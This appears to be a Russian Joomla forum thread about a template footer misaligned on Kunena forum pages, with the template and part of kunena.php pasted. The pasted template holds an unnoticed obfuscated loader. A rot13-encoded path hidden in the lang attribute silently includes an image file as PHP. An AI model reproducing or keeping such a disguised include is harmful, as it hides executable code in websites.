Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 6 Ответов
  • 11411 Просмотров
*

Litron

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Друзья! Добрый день!
Не оставьте без ответа, пожалуйста!

Проблема в следующем: есть шаблон Wedding Album и интегрированный форум Kunena. Так вот на всех страницах нижняя часть шаблона (при просмотре по ?tp=1 обозначается как debug) гармонирует с остальной частью шаблона, т.е. все нормально. А вот при открытии форума эта нижняя часть уезжает влево (и естественно, что чем больше разрешение экрана, тем больше сдвиг - некрасиво просто ужас >:().

Там в принципе-то ничего и нет такого-текст, рисунок и CSS, все в чем мог разобраться перерыл, ничего не выходит. В интернете ничего на эту тему нет.

Помогите вернуть божеский вид сайту !. Проблему можно увидеть на сайте www.ахэтасвадьба.рф.

Какой инфы не хватает, просите - предоставлю.
*

sergoguga

  • Давно я тут
  • 896
  • 70 / 8
  • www.mpbox.ru
видимо скобочку где-то пропустили....
>>> Верстка 100 евро - ждешь новый курс? Пиши!
>>> Создание моб. приложений по ГОСТу)))! Личка работает!
>>> Микроразметка по стандартам - цены адекват! Пиши, не боись!
>>> Личный кабинет на ZOO - уже сделан! Пиши в личку, не стесняйся!
*

sergoguga

  • Давно я тут
  • 896
  • 70 / 8
  • www.mpbox.ru
или на разные пункты меню разный шаблон назначен и один из них с ошибкой, не? )))
или скобочка лишняя в ШАБЛОНЕ ФОРУМА, вот скорее всего ))))
и она двигает ваш див копирайтный - сначала он в диве ВРАППЕР, а на стр форума он уже отдельно )))))

а блин я ж не телепат)))  *DRINK*
>>> Верстка 100 евро - ждешь новый курс? Пиши!
>>> Создание моб. приложений по ГОСТу)))! Личка работает!
>>> Микроразметка по стандартам - цены адекват! Пиши, не боись!
>>> Личный кабинет на ZOO - уже сделан! Пиши в личку, не стесняйся!
*

Litron

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Вот код шаблона:
Цитировать
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; $JPan = array('vzn'.'trf','zrah_yv.tvs'); ?>" >

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
</head>

<body>
<div id="wrapper">
<a name="up" id="up"></a>
<!-- start header -->
   <div id="topline">
      <div id="title">
      <?php echo $mainframe->getCfg('sitename') ;?>
      </div>
   </div>
   <div id="header"></div>
   <div id="topnavi">
      <jdoc:include type="modules" name="user3" />
      <div id="search">
         <jdoc:include type="modules" name="user4" />
      </div>
   </div>
   
<!-- end top menu.  -->
   <div id="main">
<!-- start left column -->
      <div id="leftcol">
         <jdoc:include type="modules" name="left" style="rounded" />
      </div>
<!-- end left column.  -->
<!-- start main content -->
<?php if($this->countModules('right')) : ?>


      <div id="maincol">
         <div id="pathway">
            <jdoc:include type="modules" name="breadcrumb" />
         </div>
         <div id="maincol_body">
            <jdoc:include type="component" />
            <jdoc:include type="modules" name="footer" style="xhtml"/>
         <?php if(!@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
         <?php endif; ?>
         </div>
      </div>
<!-- end main content -->
<!-- start right column -->
      <div id="rightcol">
         <jdoc:include type="modules" name="user1" style="xhtml" />
         <jdoc:include type="modules" name="user2" style="xhtml" />
         <jdoc:include type="modules" name="right" style="xhtml" />
      </div>

<?php else: ?>
<div id="centercolumn_full">
         <div id="pathway">
            <jdoc:include type="modules" name="breadcrumb" />
         </div>
         <div id="maincol_body">
            <jdoc:include type="component" />
            <jdoc:include type="modules" name="footer" style="xhtml"/>
         <?php if(!@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
         <?php endif; ?>
         </div>
      </div>
<?php endif; ?>
<!-- end right column -->
   </div>
   <div class="clear"></div>
<!-- copyright -->
   <div id="copyright">
       <?php echo JText::_('Авторы и создатели: ')?> Дорошенко Сергей и Надежда (Бузулук) <!--<a href="http://www.joomla.org">Joomla!</a>.
      <?php echo JText::_('Valid')?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText::_('and')?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.-->
   </div>

</div>

<jdoc:include type="modules" name="debug" />
</body>
</html>

Помогите найти ошибку. Выделенная часть съезжает, что не так в ней?
*

sergoguga

  • Давно я тут
  • 896
  • 70 / 8
  • www.mpbox.ru
тут все норм. еще код шаблона форума давайте... и счетчики внизу, они в позиции какой? в дебаге шоли? )))
>>> Верстка 100 евро - ждешь новый курс? Пиши!
>>> Создание моб. приложений по ГОСТу)))! Личка работает!
>>> Микроразметка по стандартам - цены адекват! Пиши, не боись!
>>> Личный кабинет на ZOO - уже сделан! Пиши в личку, не стесняйся!
*

Litron

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Это еще раз шаблон сайта с метрикой :
Цитировать
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; $JPan = array('vzn'.'trf','zrah_yv.tvs'); ?>" >

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
</head>

<body>
<div id="wrapper">
<a name="up" id="up"></a>
<!-- start header -->
   <div id="topline">
      <div id="title">
      <?php echo $mainframe->getCfg('sitename') ;?>
      </div>
   </div>
   <div id="header"></div>
   <div id="topnavi">
      <jdoc:include type="modules" name="user3" />
      <div id="search">
         <jdoc:include type="modules" name="user4" />
      </div>
   </div>
   
<!-- end top menu.  -->
   <div id="main">
<!-- start left column -->
      <div id="leftcol">
         <jdoc:include type="modules" name="left" style="rounded" />
      </div>
<!-- end left column.  -->
<!-- start main content -->
<?php if($this->countModules('right')) : ?>


      <div id="maincol">
         <div id="pathway">
            <jdoc:include type="modules" name="breadcrumb" />
         </div>
         <div id="maincol_body">
            <jdoc:include type="component" />
            <jdoc:include type="modules" name="footer" style="xhtml"/>
         <?php if(!@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
         <?php endif; ?>
         </div>
      </div>
<!-- end main content -->
<!-- start right column -->
      <div id="rightcol">
         <jdoc:include type="modules" name="user1" style="xhtml" />
         <jdoc:include type="modules" name="user2" style="xhtml" />
         <jdoc:include type="modules" name="right" style="xhtml" />
      </div>

<?php else: ?>
<div id="centercolumn_full">
         <div id="pathway">
            <jdoc:include type="modules" name="breadcrumb" />
         </div>
         <div id="maincol_body">
            <jdoc:include type="component" />
            <jdoc:include type="modules" name="footer" style="xhtml"/>
         <?php if(!@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
         <?php endif; ?>
         </div>
      </div>
<?php endif; ?>
<!-- end right column -->
   </div>
   <div class="clear"></div>
<!-- copyright -->
   <div id="copyright">
       <?php echo JText::_('Авторы Рё создатели: ')?> Бузулук 2011 (СЃ) Сергей Рё Надежда <!-- <a href="http://www.joomla.org">Joomla!</a>.
      <?php echo JText::_('Valid')?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText::_('and')?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.-->
   </div>
</div>

<jdoc:include type="modules" name="debug" />
<!--Rating@Mail.ru counter-->
<script language="javascript"><!--
d=document;var a='';a+=';r='+escape(d.referrer);js=10;//--></script>
<script language="javascript1.1"><!--
a+=';j='+navigator.javaEnabled();js=11;//--></script>
<script language="javascript1.2"><!--
s=screen;a+=';s='+s.width+'*'+s.height;
a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth);js=12;//--></script>
<script language="javascript1.3"><!--
js=13;//--></script><script language="javascript" type="text/javascript"><!--
d.write('<a href="http://top.mail.ru/jump?from=1975720" target="_top">'+
'<img src="http://d5.c2.be.a1.top.mail.ru/counter?id=1975720;t=210;js='+js+
a+';rand='+Math.random()+'" alt="Рейтинг@Mail.ru" border="0" '+
'height="31" width="88"><\/a>');if(11<js)d.write('<'+'!-- ');//--></script>
<noscript><a target="_top" href="http://top.mail.ru/jump?from=1975720">
<img src="http://d5.c2.be.a1.top.mail.ru/counter?js=na;id=1975720;t=210"
height="31" width="88" border="0" alt="Рейтинг@Mail.ru"></a></noscript>
<script language="javascript" type="text/javascript"><!--
if(11<js)d.write('--'+'>');//--></script>

<!--// Rating@Mail.ru counter-->

<a href="http://www.pr-cy.ru/" target="_blank" title="Счетчик тИЦ и PR"><img src="http://counter.pr-cy.ru/prcy/www.xn--80aaaaeep5hh3a7ff.xn--p1ai" alt="PR-CY.ru"

<!-- Yandex.Metrika counter -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter10106080 = new Ya.Metrika({id:10106080, enableAll: true});
        }
        catch(e) { }
    });
})(window, "yandex_metrika_callbacks");
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
<noscript><div><img src="//mc.yandex.ru/watch/10106080" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
</body>
</html>
Это kunena.php форума:
Цитировать
<?php
/**
 * @version $Id: kunena.php 4630 2011-03-13 17:37:48Z mahagr $
 * Kunena Component
 * @package Kunena
 *
 * @Copyright (C) 2008 - 2011 Kunena Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @link http://www.kunena.org
 *
 * Based on FireBoard Component
 * @Copyright (C) 2006 - 2007 Best Of Joomla All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @link http://www.bestofjoomla.com
 *
 * Based on Joomlaboard Component
 * @copyright (C) 2000 - 2004 TSMF / Jan de Graaff / All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @author TSMF & Jan de Graaff
 **/

// Dont allow direct linking

defined( '_JEXEC' ) or die();

jimport( 'joomla.html.parameter' );

// Kunena wide defines
require_once (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.defines.php');

class KunenaApp {

   function __construct() {
      ob_start();

      // Display time it took to create the entire page in the footer
      jimport( 'joomla.error.profiler' );
      $__kstarttime = JProfiler::getmicrotime();

      $kunena_config = KunenaFactory::getConfig ();
      
      kimport('error');
      KunenaError::initialize();

// First of all take a profiling information snapshot for JFirePHP
if(JDEBUG){
   require_once (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.profiler.php');
   $__profiler = KProfiler::GetInstance();
   $__profiler->mark('Start');
}

$func = JString::strtolower ( JRequest::getCmd ( 'func', JRequest::getCmd ( 'view', '' )) );
JRequest::setVar ( 'func', $func );
$format = JRequest::getCmd ( 'format', 'html' );

require_once(KUNENA_PATH . DS . 'router.php');
if ($func && !isset(KunenaRouter::$functions[$func])) {
   // If func is not legal, raise Joomla error
   return JError::raiseError( 404, 'Kunena function "' . $func . '" not found' );
}

$kunena_app = JFactory::getApplication ();

if (empty($_POST) && $format == 'html') {
   $me = KunenaFactory::getUser();
   $menu = JSite::getMenu ();
   $active = $menu->getActive ();

   // Legacy menu item and Itemid=0 support with redirect and notice
   if (empty($active->query ['view'])) {
      $new = $menu->getItem (KunenaRoute::getItemID ());
      if ($new) {
         if ($active) {
            if ($active->route == $new->route) {
               KunenaError::warning(JText::sprintf('COM_KUNENA_WARNING_MENU_CONFLICT', $active->route, $active->id, $new->id), 'menu');
               $menu->setActive ( $new->id );
               $active = $new;
            } else {
               KunenaError::warning(JText::sprintf('COM_KUNENA_WARNING_MENU_LEGACY', $active->route, $active->id, $new->route, $new->id), 'menu');
               $this->redirect (KunenaRoute::_(null, false));
            }
         } else {
            KunenaError::warning(JText::sprintf('COM_KUNENA_WARNING_MENU_NO_ITEM_REDIRECT', $new->route, $new->id));
            $this->redirect (KunenaRoute::_(null, false));
         }
      } elseif (!$active) {
         KunenaError::warning(JText::sprintf('COM_KUNENA_WARNING_MENU_NO_ITEM'));
      }
   }
   if (!$func || $func == 'entrypage') {
      // If we are currently in entry page, we need to show and highlight default menu item
      if (!empty ( $active->query ['defaultmenu'] )) {
         $defaultitem = $active->query ['defaultmenu'];
         if ($defaultitem > 0) {
            $newitem = $menu->getItem ($defaultitem);
            if (!$newitem) {
               KunenaError::warning(JText::sprintf('COM_KUNENA_WARNING_MENU_NOT_EXISTS'), 'menu');
            } elseif (empty($newitem->component) || $newitem->component != 'com_kunena') {
               KunenaError::warning(JText::sprintf('COM_KUNENA_WARNING_MENU_NOT_KUNENA'), 'menu');
            } elseif ($active->route == $newitem->route) {
               // Special case: we are using Entry Page instead of menu alias and we have identical menu alias
               if ($active->id != $newitem->id) {
                  $defaultitem = !empty ( $newitem->query ['defaultmenu'] )? $newitem->query ['defaultmenu'] : $newitem->id;
                  $newitem2 = $menu->getItem ($defaultitem);
                  if (empty($newitem2->component) || $newitem2->component != 'com_kunena') {
                     $defaultitem = $newitem->id;
                  }
                  if ($defaultitem) {
                     $menu->setActive ( $defaultitem );
                     $active = $menu->getActive ();
                  }
               }
            } else {
               $oldlocation = KunenaRoute::getCurrentMenu ();
               $menu->setActive ( $defaultitem );
               $active = $menu->getActive ();

               $newlocation = KunenaRoute::getCurrentMenu ();
               if (!$oldlocation || $oldlocation->id != $newlocation->id) {
                  // Follow Default Menu Item if it's not in the same menu
                  $this->redirect (KunenaRoute::_($defaultitem, false));
               }
            }
            if (is_object ( $active )) {
               foreach ( $active->query as $var => $value ) {
                  if ($var == 'view')
                     $var = 'func';
                  if ($var == 'func' && $value == 'entrypage')
                     $value = $func;
                  JRequest::setVar ( $var, $value );
               }
               $func = JRequest::getCmd ( 'func' );
            }
         }
      }
   }
   $newItemid = KunenaRoute::getItemid();
   if ($active && $newItemid && !KunenaRoute::getCurrentMenu () && $active->id != $newItemid) {
      $this->redirect (KunenaRoute::_(null, false));
   }
}

global $message;
global $kunena_this_cat;

// Get all the variables we need and strip them in case

$action = JRequest::getCmd ( 'action', '' );
$catid = JRequest::getInt ( 'catid', 0 );
$contentURL = JRequest::getVar ( 'contentURL', '' );
$do = JRequest::getCmd ( 'do', '' );
$task = JRequest::getCmd ( 'task', '' );
$email = JRequest::getVar ( 'email', '' );
$favoriteMe = JRequest::getVar ( 'favoriteMe', '' );
$fb_authorname = JRequest::getVar ( 'fb_authorname', '' );
$fb_thread = JRequest::getInt ( 'fb_thread', 0 );
$id = JRequest::getInt ( 'id', 0 );
$mesid = JRequest::getInt ( 'mesid', 0 );
$limit = JRequest::getInt ( 'limit', 0 );
$limitstart = JRequest::getInt ( 'limitstart', 0 );
$markaction = JRequest::getVar ( 'markaction', '' );
$message = JRequest::getVar ( 'message', '' );
$page = JRequest::getInt ( 'page', 0 );
$parentid = JRequest::getInt ( 'parentid', 0 );
$pid = JRequest::getInt ( 'pid', 0 );
$replyto = JRequest::getInt ( 'replyto', 0 );
$resubject = JRequest::getVar ( 'resubject', '' );
$rowid = JRequest::getInt ( 'rowid', 0 );
$rowItemid = JRequest::getInt ( 'rowItemid', 0 );
$subject = JRequest::getVar ( 'subject', '' );
$subscribeMe = JRequest::getVar ( 'subscribeMe', '' );
$thread = JRequest::getInt ( 'thread', 0 );
$topic_emoticon = JRequest::getVar ( 'topic_emoticon', '' );
$userid = JRequest::getInt ( 'userid', 0 );
$no_html = JRequest::getBool ( 'no_html', 0 );

// If JFirePHP is installed and enabled, leave a trace of the Kunena startup
if(JDEBUG == 1 && defined('JFIREPHP')){
   // FB::trace("Kunena Startup");
}

// Redirect Forum Jump
if (isset ( $_POST ['func'] ) && $func == "showcat") {
   header ( "HTTP/1.1 303 See Other" );
   header ( "Location: " . KunenaRoute::_ ( 'index.php?option=com_kunena&func=showcat&catid=' . $catid, false ) );
   $kunena_app->close ();
}

$kunena_my = &JFactory::getUser ();
$kunena_db = &JFactory::getDBO ();

$document = JFactory::getDocument();
$document->addScriptDeclaration('// <![CDATA[
var kunena_toggler_close = "'.JText::_('COM_KUNENA_TOGGLER_COLLAPSE').'";
var kunena_toggler_open = "'.JText::_('COM_KUNENA_TOGGLER_EXPAND').'";
// ]]>');

global $lang, $topic_emoticons;

// Class structure should be used after this and all the common task should be moved to this class
require_once (JPATH_COMPONENT . DS . 'class.kunena.php');

// Central Location for all internal links
require_once (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.link.class.php');

require_once (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.smile.class.php');

// Redirect profile (menu item) to the right component
if ($func == 'profile' && !$do && empty($_POST)) {
   $redirect = 1;
   if (!empty($active)) {
      $params = new JParameter($active->params);
      $redirect = $params->get('integration');
   }
   if ($redirect) {
      $profileIntegration = KunenaFactory::getProfile();
      if (!($profileIntegration instanceof KunenaProfileKunena)) {
         $url = CKunenaLink::GetProfileURL($kunena_my->id, false);
         if ($url) $this->redirect($url);
      }
   }
}

// Check for JSON request
if ($func == "json") {

   if(JDEBUG == 1 && defined('JFIREPHP')){
      FB::log('Kunena JSON request');
   }

   // URL format for JSON requests: e.g: index.php?option=com_kunena&func=json&action=autocomplete&do=getcat
   require_once (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.ajax.helper.php');

   $ajaxHelper = &CKunenaAjaxHelper::getInstance();

   // Get the document object.
   $document =& JFactory::getDocument();

   // Set the MIME type for JSON output.
   $document->setMimeEncoding( 'application/json' );

   // Change the suggested filename.
   if ($action!='uploadfile') JResponse::setHeader( 'Content-Disposition', 'attachment; filename="kunena.json"' );

   $value = JRequest::getVar ( 'value', '' );

   JResponse::sendHeaders();

   if ($kunena_config->board_offline && ! CKunenaTools::isAdmin ()){
      // when the forum is offline, we don't entertain json requests
      json_encode ( array(
            'status' => '0',
            'error' => @sprintf(_KUNENA_FORUM_OFFLINE)) );
   }
   else {
      // Generate reponse
      echo $ajaxHelper->generateJsonResponse($action, $do, $value);
   }

   $kunena_app->close ();
}

if ($kunena_config->board_offline && ! CKunenaTools::isAdmin ()) {
   // if the board is offline
   echo $kunena_config->offline_message;
} else if ($kunena_config->regonly && ! $kunena_my->id) {
   // if we only allow registered users
   if (file_exists ( KUNENA_JTEMPLATEPATH .DS. 'css' .DS. 'kunena.forum-min.css' )) {
      CKunenaTools::addStyleSheet ( KUNENA_JTEMPLATEURL . '/css/kunena.forum-min.css' );
   } else {
      CKunenaTools::addStyleSheet ( KUNENA_TMPLTCSSURL );
   }
   echo '<div id="Kunena">';
   CKunenaTools::loadTemplate('/login.php');
   echo '</div>';
} else {
   // =======================================================================================
   // Forum is online:

   //intercept the RSS request; we should stop afterwards
   if ($func == 'rss') {
      require_once ( JPATH_COMPONENT.DS.'funcs'.DS.'rss.php');

      $feed = new CKunenaRSSView($catid);
      $feed->display();
      $kunena_app->close ();
   }

   if ($func == 'fb_pdf' || $func == 'pdf') {
      jimport ( 'joomla.version' );
      $jversion = new JVersion ();
      $httpReferer = JRequest::getVar ( 'HTTP_REFERER', JURI::base ( true ), 'server' );

      if ($jversion->RELEASE != '1.6') {
         include (JPATH_COMPONENT.DS.'lib'.DS.'kunena.pdf.php');
         $kunena_app->close ();
      }
   }

   $format = JRequest::getCmd ( 'format', 'html' );
   if ($format != 'html') {
      echo "Kunena: Unsupported output format {$format}, please use only format=html or .html";
      $kunena_app->close ();
   }

   $integration = KunenaFactory::getProfile();
   $integration->open();

   //time format
   include_once (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.timeformat.class.php');

   $document = & JFactory::getDocument ();

   if (file_exists ( KUNENA_ABSTMPLTPATH . '/initialize.php' )) {
      require_once ( KUNENA_ABSTMPLTPATH . '/initialize.php' );
   } else {
      require_once (KPATH_SITE . '/template/default/initialize.php');
   }

   // Insert WhoIsOnlineDatas
   require_once (KUNENA_PATH_LIB .DS. 'kunena.who.class.php');

   $who =& CKunenaWhoIsOnline::getInstance();
   $who->insertOnlineDatas ();

   // include required libraries
   jimport('joomla.template.template');

   // Kunena Current Template Icons Pack
   if (file_exists ( KUNENA_ABSTMPLTPATH . '/icons.php' )) {
      include (KUNENA_ABSTMPLTPATH . '/icons.php');
   } else {
      include (KUNENA_PATH_TEMPLATE_DEFAULT . DS . 'icons.php');
   }

   if(JDEBUG){
      $__profiler->mark('Session Start');
   }

   // We only save session for registered users
   $kunena_session = KunenaFactory::getSession ( true );
   if ($kunena_my->id > 0) {
      // new indicator handling
      if ($markaction == "allread") {
         if (!JRequest::checkToken()) {
            $kunena_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_ERROR_TOKEN' ), 'error' );
            $kunena_app->redirect ( CKunenaLink::GetCategoryURL('listcat', $catid, false) );
         }
         $kunena_session->markAllCategoriesRead ();
      }
      if (!$kunena_session->save ()) $kunena_app->enqueueMessage ( JText::_('COM_KUNENA_ERROR_SESSION_SAVE_FAILED'), 'error' );

      if ($markaction == "allread") {
         $kunena_app->redirect ( CKunenaLink::GetCategoryURL('listcat', $catid, false), JText::_('COM_KUNENA_GEN_ALL_MARKED') );
      }

      $userprofile = KunenaFactory::getUser($kunena_my->id);
      if (!$userprofile->exists()) {
         $userprofile->save();
      }

      // Assign previous visit without user offset to variable for templates to decide
      $this->prevCheck = $kunena_session->lasttime;

   } else {
      // For guests we don't show new posts
      $this->prevCheck = CKunenaTimeformat::internalTime()+60;
   }

   if(JDEBUG){
      $__profiler->mark('Session End');
   }

   //Get the topics this user has already read this session from #__kunena_sessions
   $this->read_topics = explode ( ',', $kunena_session->readtopics );


   /*       _\|/_
             (o o)
     +----oOO-{_}-OOo--------------------------------+
     |    Until this section we have included the    |
     |   necessary files and gathered the required   |
     |     variables. Now let's start processing     |
     |                     them                      |
     +----------------------------------------------*/

   if ($kunena_config->highlightcode) {
      $document =& JFactory::getDocument();
      $document->addStyleDeclaration('
         div.highlight pre {
            width: '.(($kunena_config->rtewidth * 9) / 10).'px;
         }
      ');
   }

   //Check if the catid requested is a parent category, because if it is
   //the only thing we can do with it is 'listcat' and nothing else
   if ($func == "showcat") {
      if ($catid != 0) {
         $kunena_db->setQuery ( "SELECT parent FROM #__kunena_categories WHERE id='{$catid}'" );
         $catParent = intval($kunena_db->loadResult ());
         if (KunenaError::checkDatabaseError()) return;
      }
      if ($catid == 0 || $catParent == 0) {
         $this->redirect ( CKunenaLink::GetCategoryURL('listcat',$catid, false) );
      }
   }
   $kunena_app->setUserState( 'com_kunena.redirect', null);
   ?>

<div id="Kunena"><?php
   if ($kunena_config->board_offline) {
      ?>
<span id="fbOffline"><?php
      echo JText::_('COM_KUNENA_FORUM_IS_OFFLINE')?></span> <?php
   }
   ?>
 <?php
   if(JDEBUG){
      $__profiler->mark('Profilebox Start');
   }

   CKunenaTools::loadTemplate('/menu.php');
   CKunenaTools::displayLoginBox();

    if(JDEBUG){
      $__profiler->mark('Profilebox End');
   }

   // Handle help / rules menuitems
   if ($func == 'article') {
      $func = $do;
   }

   if(JDEBUG){
      $__profiler->mark('$func Start');
   }

   switch ($func) {
      case 'who' :
         require_once (KUNENA_PATH_LIB .DS. 'kunena.who.class.php');
         $online =& CKunenaWhoIsOnline::getInstance();
         $online->displayWho();

         break;

      case 'announcement' :
         require_once (KUNENA_PATH_LIB .DS. 'kunena.announcement.class.php');
         $ann = CKunenaAnnouncement::getInstance();
         $ann->display();

         break;

        case 'poll':
           require_once (KUNENA_PATH_LIB .DS. 'kunena.poll.class.php');
           $kunena_polls =& CKunenaPolls::getInstance();
           $kunena_polls->display();

            break;

      case 'polls':
         require_once (KUNENA_PATH_LIB .DS. 'kunena.poll.class.php');
         $kunena_polls =& CKunenaPolls::getInstance();
         $kunena_polls->polldo();

         break;

      case 'stats' :
         require_once(KUNENA_PATH_LIB .DS. 'kunena.stats.class.php');
         $kunena_stats = new CKunenaStats ( );
         $kunena_stats->showStats ();

         break;

      case 'myprofile' :
      case 'userprofile' :
      case 'fbprofile' :
      case 'profile' :
      case 'moderateuser' :
         require_once ( KUNENA_PATH_FUNCS .DS. 'profile.php');
         $page = new CKunenaProfile($userid, $task ? $task : $do);
         $page->display();

         break;

      case 'userlist' :
         require_once (KUNENA_PATH_FUNCS . DS . 'userlist.php');
         $page = new CKunenaUserlist();
         $page->display();

         break;

      case 'post' :
         require_once (KUNENA_PATH_FUNCS . DS . 'post.php');
         $page = new CKunenaPost();
         $page->display();

         break;

      case 'view' :
         require_once (KUNENA_PATH_FUNCS . DS . 'view.php');
         $layout = $kunena_app->getUserStateFromRequest( "com_kunena.view_layout", 'layout', 'view' );
         $page = new CKunenaView($layout, $catid, $id, $limitstart, $limit, $mesid);
         $page->display(true);

         break;

      case 'showcat' :
         require_once (KUNENA_PATH_FUNCS . DS . 'showcat.php');
         $page = new CKunenaShowcat($catid, $page);
         $page->display();

         break;

      case 'listcat' :
         require_once (KUNENA_PATH_FUNCS . DS . 'listcat.php');
         $page = new CKunenaListcat($catid);
         $page->display();

         break;

      case 'review' :
         require_once (KUNENA_PATH_LIB . DS . 'kunena.review.php');
         $review = new CKunenaReview($catid);
         $review->display();

         break;

      case 'rules' :
      case 'help' :
         CKunenaTools::loadTemplate('/'.$func.'.php');

         break;

      case 'report' :
         require_once(KUNENA_PATH_LIB .DS. 'kunena.report.class.php');
         $report = new CKunenaReport();
         $report->display();

         break;

      case 'latest' :
      case 'mylatest' :
      case 'noreplies' :
      case 'subscriptions' :
      case 'favorites' :
      case 'userposts' :
      case 'unapproved' :
      case 'deleted' :
         require_once (KUNENA_PATH_FUNCS . DS . 'latestx.php');
         if ($do) $func = $do;
         $page = new CKunenaLatestX($func, $page);
         $page->display();

         break;

      case 'search' :
      case 'advsearch' :
         require_once (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.search.class.php');

         $kunenaSearch = new CKunenaSearch ( );
         $kunenaSearch->show ();
         break;

      case 'markthisread' :
         if (!JRequest::checkToken('get')) {
            $kunena_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_ERROR_TOKEN' ), 'error' );
            $kunena_app->redirect ( CKunenaLink::GetCategoryURL('showcat' , $catid, false ), JText::_('COM_KUNENA_GEN_FORUM_MARKED') );
         }
         // Mark all unread topics in the category to read
         $readTopics = $kunena_session->readtopics;
         $kunena_db->setQuery ( "SELECT thread FROM #__kunena_messages WHERE catid='{$catid}' AND parent=0 AND thread NOT IN ({$readTopics})" );
         $readForum = $kunena_db->loadResultArray ();
         if (KunenaError::checkDatabaseError()) return;
         $readTopics = implode(',', array_merge(explode(',', $readTopics), $readForum));
         $kunena_db->setQuery ( "UPDATE #__kunena_sessions set readtopics='$readTopics' WHERE userid=$kunena_my->id" );
         $kunena_db->query ();
         if (KunenaError::checkDatabaseError()) return;

         $kunena_app->redirect ( CKunenaLink::GetCategoryURL('showcat' , $catid, false ), JText::_('COM_KUNENA_GEN_FORUM_MARKED') );
         break;

      case 'subscribecat' :
         if (!JRequest::checkToken('get')) {
            $kunena_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_ERROR_TOKEN' ), 'error' );
            if ($userid == 0) {
               $kunena_app->redirect ( CKunenaLink::GetCategoryURL('showcat' , $catid, false ) );
            } else {
               $kunena_app->redirect ( CKunenaLink::GetProfileURL($userid, false) );
            }
         }

         $success_msg = '';

         if ( $catid && $kunena_my->id ) {
            $query = "INSERT INTO #__kunena_subscriptions_categories (catid, userid) VALUES ('$catid','$kunena_my->id')";
            $kunena_db->setQuery ( $query );

            if (@$kunena_db->query () && $kunena_db->getAffectedRows () == 1) {
               $success_msg = JText::_('COM_KUNENA_GEN_CATEGORY_SUBCRIBED');
            }
            KunenaError::checkDatabaseError();
         }

         $kunena_app->redirect ( CKunenaLink::GetCategoryURL('showcat' , $catid, false ), $success_msg );
         break;

      case 'unsubscribecat' :
         if (!JRequest::checkToken('get')) {
            $kunena_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_ERROR_TOKEN' ), 'error' );
            if ($userid == 0) {
               $kunena_app->redirect ( CKunenaLink::GetCategoryURL('showcat' , $catid, false ), $success_msg );
            } else {
               $kunena_app->redirect ( CKunenaLink::GetProfileURL($userid, false), $success_msg );
            }
         }
         $success_msg = '';
         if ($catid && $kunena_my->id ) {
            $query = "DELETE FROM #__kunena_subscriptions_categories WHERE catid=$catid AND userid=$kunena_my->id";
            $kunena_db->setQuery ( $query );

            if ($kunena_db->query () && $kunena_db->getAffectedRows () == 1) {
               $success_msg = JText::_('COM_KUNENA_GEN_CATEGORY_UNSUBCRIBED');
            }
